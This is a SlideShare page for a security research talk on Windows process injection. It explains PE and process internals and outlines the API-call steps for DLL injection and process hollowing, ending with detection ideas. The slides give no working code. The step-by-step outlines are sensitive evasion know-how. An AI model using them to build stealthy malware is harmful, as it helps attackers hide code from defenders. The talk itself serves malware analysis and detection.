SlideShare une entreprise Scribd logo

Process injection - Malware style

Sander Demeester
Sander Demeester

As computer systems become more sophisticated, process injection techniques also evolve. These techniques are notorious for their use by "malicious software" to hide code execution and avoid detection. In this presentation we dive deep into the Windows runtime and we demonstrate these techniques. Besides, we also learn how to code construction and design patterns that relate to perform hidden code can recognize.

Technologie
1  sur  51
Télécharger pour lire hors ligne
Process Injection Malware style
Who am I • Security Researcher • PwC: Consultant • Former student UGent • {@ -F-G}/SanderDemeester
Outline • Windows processes: An introduction • Dll Injection • Process replacement • Questions
Windows PE • It’s a file format! • It contains information about the executable • It’s THE windows format for all executables • DLL • EXE • SYS
• Imports - Functions from other libraries • Exports - Functions that should be called • NT Headers - used by windows loader • Sections - .text, .rdata, .data,… • Relocations - Preferred base address • Resources - Strings, icons, … • Much more..
PE - A short demo
What is a process? • It’s the execution of a program • One or more threads run in the context of a process • Thread - Conceptually, an execution unit inside the process
Process as a structure • Fine.. A process is a thing that runs in the system.. • The OS uses different kernel structures to manage those processes • Remember, a process believes it has the whole adres space to It’s self..
EPROCESS • Executive component of windows kernel • It's a process object for a process • Kernel use: IO transfer, handle virtual memory • Drivers: PsGetCurrentProcess()
PEB • Structure in userspace • Used by operating system code in user-space (ntdll,kernel32) • Contains information about a running process • CLI parameters, pointer to heap,image base address • A pointer to PEB_LDR_DATA
PEB_LDR_DATA • Contains information about the loaded modules associated with the running process • Has the anchor for a doubly linked list that contains each loaded module • LDR_DATA_TABLE_ENTRY
TIB • Stores information about the current thread • Can be obtained via the FS or GS registers • Used to obtain information about the running thread • Things like the SEH, stack base • Access to the thread local storage array
PEB,TIB - A short demo
So…What does this mean? • Different windows components need to interact with the process • Windows API’s need to provide access to that information
Process in memory • There is something called virtual memory • Maps memory addresses into physical addresses, the virtual memory address space • A collection of contiguous segments • Each process thinks.. It's all mine
Virtual memory - A short demo
Virtual memory • Mapping virtual memory addresses into physical addresses • Base relocation: Fixing memory locations at load time. • Relative virtual addresses or RVA • Just made the job of the loader easier • Three types of “addresses” • Logical addresses: perspective of the running process • Linear addresses: logical addresses after segment translation • Physical addresses: linear addresses after page table translation
Outline • Windows processes: An introduction • Dll Injection • Process replacement • Questions
Injection.. Why? • We would like to hide the fact that we are running code • Makes deployment a lot easier • Bypass certain security filters
DLL Injection • Force a different process to load a DLL at runtime • Use the windows API • The OS automatically calls the DLLMain function • DLL inherits the same rights as the target process • Everything the malicious code does will appear to come from the injected process
DLL Injection - Why? • Everything the malicious code does will appear to come from the injected process • It inherits all the permissions of the process • Read from that process virtual memory
DLL Injection - Demo
DLL injection steps • The loader obtains a handle to the victim process • Most often uses CreateToolhelp32snapshot, Process32First and Process32Next • Obtain the Process ID • Obtain the handle to the process
DLL injection steps • Make room to create a new thread • Allocate enough memory in the victims process for the DLL name • Write only the name to the virtual memory of our victim • Obtain a module handle to LoadLibraryA
DLL injection steps • The CreateRemoteThread is used to open and execute a thread in the victims process • The CreateRemoteThread is passed three parameters • hProcess - process handle • lpStartAddress - starting point of the code for our new thread, in our case. LoadLibraryA • lpParameter - argument for the new thread
DLL Injection - code constructs
Outline • Windows processes: An introduction • Dll Injection • Process replacement • Questions
Process replacement - Why? • Disguise malware as a legit process • Can not crash the host process and risk being discovered • Same permissions as the replaced process
Process replacement • Processes are just bytes in memory • Overwrite the memory space of our victim process • Disguises our code as a legitimate process • Inherit all the permissions of the replaced process
Process replacement - How would we do it? • Create a process in a suspended state • Replace all the code and memory in the process with our code • Run the process • Easy!
Process replacement - A short demo
What do we need? • We need a different “process” to replace the existing one? • A way to “stop” a legitimate process that is running? • A lot of information on the legitimate process • Ways to write into the virtual memory of a different process? • A brain that works
Windows resources • A program contains “resources” • Contains raw images, bitmaps and dialog boxes • But it can contain what we want? • Steganography? Anyone? • Lets put a PE in it!
Resource hacker - A short demo
• Create a new process in a SUSPENDED_STATE
Process replacement steps • Obtain our PE file stored in the resource section • Create a new windows process in the suspended state • Access the “thread context” of the suspended progress thread. • The EBX register of newly created process contains a pointer to the PEB structure
Process replacement steps • The PEB structure contains a lot of information about the process, including the image base address. • Using an “undocumented" API call NtUnmapViewOfSection we can remove the code from memory • Windows Native System Services routine - use a function pointer to get to it.
• We need to place our malicious PE file into memory • Obtain the image base address and the size of our program • Call VirtualAllocEx and pass it the handle of our suspended thread and set the permissions of the allocated memory to PAGE_EXECUTE_READWRITE
• So far so good • Start parsing the PE file to obtain pointers to the different section • SizeOfHeaders is at some offset in the PE header • NumberOfSections is at some offset in the PE header • Copy the PE header to the exact same place in the virtual adres space as the suspended process • Read the IMAGE_HEADER_SECTION and perform some pointer calculations
• Keep going.. • Using the structures • IMAGE_SECTION_HEADERS.SizeOfRawData • IMAGE_SECTION_HEADERS.PointerToRawData • IMAGE_SECTION_HEADER.VirtualAddress • We perform pointer calculations to copy the data over
Are we done yet? • The windows loader has done most of the work • We need to tell the loader where it should jump to • Patch the original program entry point with the one from our PE file • After loading, lpContext->_eax contains our OEP • Call SetThreadContext to update the thread context • Start of suspended process
Process replacement - code constructs
Is this still the same process? • How do you define a process? • As far as windows is concerned, it’s what It's loaded into memory • Using the API to observe the process, it is the original process
Can we detect this? • We can monitor for a sequence of strange API calls? • We can compare the code sections of the running process with the ones stored on the filesystem • We can define rules on how a program should behave and compare
What other techniques do we have? • Direct injection • Local and remote hook injection • Detour hijacking • APC injection from user space and kernel space • I’m sure, many more.
BSidesLV 2015 • Injection on Steroids: Code-less code injection and 0-day techniques.. • State-of-the-art
(*(*FNPTR) (LPVOID,*char)) (QUESTIONS,”?”)
Process injection - Malware style

Recommandé

9: OllyDbg
9: OllyDbg9: OllyDbg
9: OllyDbg
Sam Bowne
 
Android Security
Android SecurityAndroid Security
Android Security
Arqum Ahmad
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Mohammed Danish Amber
 
Introduction to Malware
Introduction to MalwareIntroduction to Malware
Introduction to Malware
amiable_indian
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
Mohammed Adam
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 

Recommandé

9: OllyDbg
9: OllyDbg9: OllyDbg
9: OllyDbg
Sam Bowne
 
Android Security
Android SecurityAndroid Security
Android Security
Arqum Ahmad
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Mohammed Danish Amber
 
Introduction to Malware
Introduction to MalwareIntroduction to Malware
Introduction to Malware
amiable_indian
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
Mohammed Adam
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
OWASP Delhi
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
Fadi Abdulwahab
 
Dll injection
Dll injectionDll injection
Dll injection
KarlFrank99
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
Eryk Budi Pratama
 
Android security
Android securityAndroid security
Android security
Mobile Rtpl
 
Burp suite
Burp suiteBurp suite
Burp suite
SOURABH DESHMUKH
 
Nessus Software
Nessus SoftwareNessus Software
Nessus Software
Megha Sahu
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration Testing
Subho Halder
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
Command injection
Command injectionCommand injection
Command injection
penetration Tester
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
Linux security
Linux securityLinux security
Linux security
trilokchandra prakash
 
Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
Rob Ragan
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
bilcorry
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
CNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware LaunchingCNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware Launching
Sam Bowne
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
Joe Desimone
 

Contenu connexe

Tendances

(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 

Tendances (20)

OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
 
Dll injection
Dll injectionDll injection
Dll injection
 
Cybersecurity - Mobile Application Security
Cybersecurity - Mobile Application SecurityCybersecurity - Mobile Application Security
Cybersecurity - Mobile Application Security
 
Android security
Android securityAndroid security
Android security
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Nessus Software
Nessus SoftwareNessus Software
Nessus Software
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration Testing
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
 
Command injection
Command injectionCommand injection
Command injection
 
Windows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv ShahWindows privilege escalation by Dhruv Shah
Windows privilege escalation by Dhruv Shah
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
Linux security
Linux securityLinux security
Linux security
 
Sql injection
Sql injectionSql injection
Sql injection
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 

Similaire à Process injection - Malware style

Chapter -2 operating system presentation
Chapter -2 operating system presentationChapter -2 operating system presentation
Chapter -2 operating system presentation
chnrketan
 
"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)
"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)
"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)
Tech in Asia ID
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON
 

Similaire à Process injection - Malware style (20)

CNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware LaunchingCNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware Launching
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
 
Threads in Operating System | Multithreading | Interprocess Communication
Threads in Operating System | Multithreading | Interprocess CommunicationThreads in Operating System | Multithreading | Interprocess Communication
Threads in Operating System | Multithreading | Interprocess Communication
 
OS Internals and Portable Executable File Format
OS Internals and Portable Executable File FormatOS Internals and Portable Executable File Format
OS Internals and Portable Executable File Format
 
CNIT 126 7: Analyzing Malicious Windows Programs
CNIT 126 7: Analyzing Malicious Windows ProgramsCNIT 126 7: Analyzing Malicious Windows Programs
CNIT 126 7: Analyzing Malicious Windows Programs
 
Windows internals
Windows internalsWindows internals
Windows internals
 
Chapter -2 operating system presentation
Chapter -2 operating system presentationChapter -2 operating system presentation
Chapter -2 operating system presentation
 
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
 
CNIT 126 Ch 7: Analyzing Malicious Windows Programs
CNIT 126 Ch 7: Analyzing Malicious Windows ProgramsCNIT 126 Ch 7: Analyzing Malicious Windows Programs
CNIT 126 Ch 7: Analyzing Malicious Windows Programs
 
Operating Systems 1 (7/12) - Threads
Operating Systems 1 (7/12) - ThreadsOperating Systems 1 (7/12) - Threads
Operating Systems 1 (7/12) - Threads
 
They why behind php frameworks
They why behind php frameworksThey why behind php frameworks
They why behind php frameworks
 
Utilizing the OpenNTF Domino API
Utilizing the OpenNTF Domino APIUtilizing the OpenNTF Domino API
Utilizing the OpenNTF Domino API
 
Course 102: Lecture 18: Process Life Cycle
Course 102: Lecture 18: Process Life CycleCourse 102: Lecture 18: Process Life Cycle
Course 102: Lecture 18: Process Life Cycle
 
"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)
"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)
"You Don't Know NODE.JS" by Hengki Mardongan Sihombing (Urbanhire)
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
 
Practical Malware Analysis Ch12
Practical Malware Analysis Ch12Practical Malware Analysis Ch12
Practical Malware Analysis Ch12
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
Utilizing the open ntf domino api
Utilizing the open ntf domino apiUtilizing the open ntf domino api
Utilizing the open ntf domino api
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
Utilizing the OpenNTF Domino API
Utilizing the OpenNTF Domino APIUtilizing the OpenNTF Domino API
Utilizing the OpenNTF Domino API
 

Dernier

A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 

Dernier (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 

Process injection - Malware style

  • 2. Who am I • Security Researcher • PwC: Consultant • Former student UGent • {@ -F-G}/SanderDemeester
  • 3. Outline • Windows processes: An introduction • Dll Injection • Process replacement • Questions
  • 4. Windows PE • It’s a file format! • It contains information about the executable • It’s THE windows format for all executables • DLL • EXE • SYS
  • 5. • Imports - Functions from other libraries • Exports - Functions that should be called • NT Headers - used by windows loader • Sections - .text, .rdata, .data,… • Relocations - Preferred base address • Resources - Strings, icons, … • Much more..
  • 6. PE - A short demo
  • 7. What is a process? • It’s the execution of a program • One or more threads run in the context of a process • Thread - Conceptually, an execution unit inside the process
  • 8. Process as a structure • Fine.. A process is a thing that runs in the system.. • The OS uses different kernel structures to manage those processes • Remember, a process believes it has the whole adres space to It’s self..
  • 9.
  • 10. EPROCESS • Executive component of windows kernel • It's a process object for a process • Kernel use: IO transfer, handle virtual memory • Drivers: PsGetCurrentProcess()
  • 11. PEB • Structure in userspace • Used by operating system code in user-space (ntdll,kernel32) • Contains information about a running process • CLI parameters, pointer to heap,image base address • A pointer to PEB_LDR_DATA
  • 12. PEB_LDR_DATA • Contains information about the loaded modules associated with the running process • Has the anchor for a doubly linked list that contains each loaded module • LDR_DATA_TABLE_ENTRY
  • 13. TIB • Stores information about the current thread • Can be obtained via the FS or GS registers • Used to obtain information about the running thread • Things like the SEH, stack base • Access to the thread local storage array
  • 14. PEB,TIB - A short demo
  • 15. So…What does this mean? • Different windows components need to interact with the process • Windows API’s need to provide access to that information
  • 16. Process in memory • There is something called virtual memory • Maps memory addresses into physical addresses, the virtual memory address space • A collection of contiguous segments • Each process thinks.. It's all mine
  • 17.
  • 18. Virtual memory - A short demo
  • 19. Virtual memory • Mapping virtual memory addresses into physical addresses • Base relocation: Fixing memory locations at load time. • Relative virtual addresses or RVA • Just made the job of the loader easier • Three types of “addresses” • Logical addresses: perspective of the running process • Linear addresses: logical addresses after segment translation • Physical addresses: linear addresses after page table translation
  • 20. Outline • Windows processes: An introduction • Dll Injection • Process replacement • Questions
  • 21. Injection.. Why? • We would like to hide the fact that we are running code • Makes deployment a lot easier • Bypass certain security filters
  • 22. DLL Injection • Force a different process to load a DLL at runtime • Use the windows API • The OS automatically calls the DLLMain function • DLL inherits the same rights as the target process • Everything the malicious code does will appear to come from the injected process
  • 23. DLL Injection - Why? • Everything the malicious code does will appear to come from the injected process • It inherits all the permissions of the process • Read from that process virtual memory
  • 24.
  • 26. DLL injection steps • The loader obtains a handle to the victim process • Most often uses CreateToolhelp32snapshot, Process32First and Process32Next • Obtain the Process ID • Obtain the handle to the process
  • 27. DLL injection steps • Make room to create a new thread • Allocate enough memory in the victims process for the DLL name • Write only the name to the virtual memory of our victim • Obtain a module handle to LoadLibraryA
  • 28. DLL injection steps • The CreateRemoteThread is used to open and execute a thread in the victims process • The CreateRemoteThread is passed three parameters • hProcess - process handle • lpStartAddress - starting point of the code for our new thread, in our case. LoadLibraryA • lpParameter - argument for the new thread
  • 29. DLL Injection - code constructs
  • 30. Outline • Windows processes: An introduction • Dll Injection • Process replacement • Questions
  • 31. Process replacement - Why? • Disguise malware as a legit process • Can not crash the host process and risk being discovered • Same permissions as the replaced process
  • 32. Process replacement • Processes are just bytes in memory • Overwrite the memory space of our victim process • Disguises our code as a legitimate process • Inherit all the permissions of the replaced process
  • 33. Process replacement - How would we do it? • Create a process in a suspended state • Replace all the code and memory in the process with our code • Run the process • Easy!
  • 35. What do we need? • We need a different “process” to replace the existing one? • A way to “stop” a legitimate process that is running? • A lot of information on the legitimate process • Ways to write into the virtual memory of a different process? • A brain that works
  • 36. Windows resources • A program contains “resources” • Contains raw images, bitmaps and dialog boxes • But it can contain what we want? • Steganography? Anyone? • Lets put a PE in it!
  • 37. Resource hacker - A short demo
  • 38. • Create a new process in a SUSPENDED_STATE
  • 39. Process replacement steps • Obtain our PE file stored in the resource section • Create a new windows process in the suspended state • Access the “thread context” of the suspended progress thread. • The EBX register of newly created process contains a pointer to the PEB structure
  • 40. Process replacement steps • The PEB structure contains a lot of information about the process, including the image base address. • Using an “undocumented" API call NtUnmapViewOfSection we can remove the code from memory • Windows Native System Services routine - use a function pointer to get to it.
  • 41. • We need to place our malicious PE file into memory • Obtain the image base address and the size of our program • Call VirtualAllocEx and pass it the handle of our suspended thread and set the permissions of the allocated memory to PAGE_EXECUTE_READWRITE
  • 42. • So far so good • Start parsing the PE file to obtain pointers to the different section • SizeOfHeaders is at some offset in the PE header • NumberOfSections is at some offset in the PE header • Copy the PE header to the exact same place in the virtual adres space as the suspended process • Read the IMAGE_HEADER_SECTION and perform some pointer calculations
  • 43. • Keep going.. • Using the structures • IMAGE_SECTION_HEADERS.SizeOfRawData • IMAGE_SECTION_HEADERS.PointerToRawData • IMAGE_SECTION_HEADER.VirtualAddress • We perform pointer calculations to copy the data over
  • 44. Are we done yet? • The windows loader has done most of the work • We need to tell the loader where it should jump to • Patch the original program entry point with the one from our PE file • After loading, lpContext->_eax contains our OEP • Call SetThreadContext to update the thread context • Start of suspended process
  • 46. Is this still the same process? • How do you define a process? • As far as windows is concerned, it’s what It's loaded into memory • Using the API to observe the process, it is the original process
  • 47. Can we detect this? • We can monitor for a sequence of strange API calls? • We can compare the code sections of the running process with the ones stored on the filesystem • We can define rules on how a program should behave and compare
  • 48. What other techniques do we have? • Direct injection • Local and remote hook injection • Detour hijacking • APC injection from user space and kernel space • I’m sure, many more.
  • 49. BSidesLV 2015 • Injection on Steroids: Code-less code injection and 0-day techniques.. • State-of-the-art